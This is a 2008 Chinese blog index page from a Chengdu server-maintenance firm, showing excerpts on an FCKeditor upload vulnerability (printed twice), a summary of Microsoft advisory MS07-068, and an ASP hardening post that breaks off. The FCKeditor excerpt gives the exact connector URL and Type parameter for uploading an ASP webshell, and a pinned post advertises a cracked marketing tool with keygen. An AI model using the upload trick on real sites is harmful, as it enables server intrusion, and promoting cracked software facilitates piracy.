熊猫故乡-成都服务器维护-绵阳服务器维护-四川网络安全维护-秘密网

熊猫故乡-成都365安全网 -秘密网-成都服务器维护-绵阳服务器维护-四川网络安全维护 提供企业网络安全维护、企业网站维护、企业服务器维护等服务(成都服务器维护-绵阳服务器维护),咨询: 傅先生 13688425344

[置顶] 地震孤儿收养 汶川地震孤儿 成都儿童福利院孤儿收养报名处

[置顶] 网站推广 全能营销7.7破解版免费下载 全能营销注册机 全能营销8.2破解版

[置顶] 服务器维护报价-成都专业维护服务器报价- 服务器安全服务报价

[置顶] 服务器维护之硬件系统的安全防护

fckeditor网页编辑器的漏洞


http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打开这个地址就可以上传任何类型的文件了,我上传的是.asa的,在编辑器的目录下正常的显示出了马.
但一时间找不到上传地址,后来经过推断,确定马儿上传到的位置是:http://www.xxx.tw/UserFiles/all/1.asa
经过我们的思路整理,得出了 "Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.

比如输入:

http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=cnandbaol&Connector=connectors/asp/connector.asp
.....................

fckeditor网页编辑器的漏洞


http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打开这个地址就可以上传任何类型的文件了,我上传的是.asa的,在编辑器的目录下正常的显示出了马.
但一时间找不到上传地址,后来经过推断,确定马儿上传到的位置是:http://www.xxx.tw/UserFiles/all/1.asa
经过我们的思路整理,得出了 "Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.

比如输入:

http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=cnandbaol&Connector=connectors/asp/connector.asp
.....................

MS07-068:Windows Media File Format中存在漏洞

摘要
此关键安全更新解决了 Windows Media File Format 中秘密报告的漏洞。 如果用户在 Windows Media Format Runtime 中查看特制文件,此漏洞可能允许远程执行代码。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。

建议。 Microsoft 建议用户立即应用此更新。

受影响的软件

操作系统 组件 最大安全影响 综合严重程度等级 此更新替代的公告
Windows Media Format Runtime 7.1
Microsoft Windows 2000 Service Pack 4
Windows Media Format Runtime 7.1 (KB941569)
远程执行代码
严重
MS06-078

Windows Media Format Runtime 9
Windows 2000 Service Pack 4
Windows Media Format Runtime 9 (KB941569)
远程执行代码
严重
MS06-078

Windows XP Service Pack 2
Windows Media Format Runtime 9 (KB941569)
远程执行代码
严重
MS06-078

Windows Media Format Runtime 9.5
Windows XP Service Pack 2
Windows Media Format Runtime 9.5 (KB941569)
远程执行代码
严重
请参阅与此安全更新相关的常见问题

Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2
Windows Media Format Runtime 9.5 (KB941569)
远程执行代码
严重


Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2
Windows Media Format Runtime 9.5 (KB941569)
远程执行代码
严重


Windows Server 2003 x64 Edition 和 Windows Server 2003 x64 Edition Service Pack 2
Windows Media Format Runtime 9.5 (KB941569)
远程执行代码
严重


Windows Media Format Runtime 9.5 x64 Edition
Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2
Windows Media Format Runtime 9.5 x64 Edition (KB941569)
远程执行代码
严重


Windows Server 2003 x64 Edition 和 Windows Server 2003 x64 Edition Service Pack 2
Windows Media Format Runtime 9.5 x64 Edition (KB941569)
远程执行代码
严重


Windows Media Format Runtime 11
Windows XP Service Pack 2
Windows Media Format Runtime 11 (KB941569)
远程执行代码
严重
请参阅与此安全更新相关的常见问题

Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2
Windows Media Format Runtime 11 (KB941569)
远程执行代码
严重


Windows Vista
Windows Media Format Runtime 11 (KB941569)
远程执行代码
严重


Windows Vista x64 Edition
Windows Media Format Runtime 11 (KB941569)
远程执行代码
严重


Windows Media Services 9.1
Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2
Windows Media Services 9.1 (KB944275)
远程执行代码
严重


Windows Server 2003 x64 Edition 和 Windows Server 2003 x64 Edition Service Pack 2
Windows Media Services 9.1 x64 Edition (KB944275)
远程执行代码
严重


Asp脚本漏洞的安全防范

(1)首先我们从安装iis6.0的时候做好安装,我初步整理的安装格式如下:

分页:[«]1[»]

日历

<< 2008-10 >>

Sun

Mon

Tue

Wed

Thu

Fri

Sat

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

Tags

Powered By Z-Blog 1.7 Laputa Build 70216 SEO

版权所有 2006-2007 成都安全网. 联系人:傅先生 联系电话:13688425344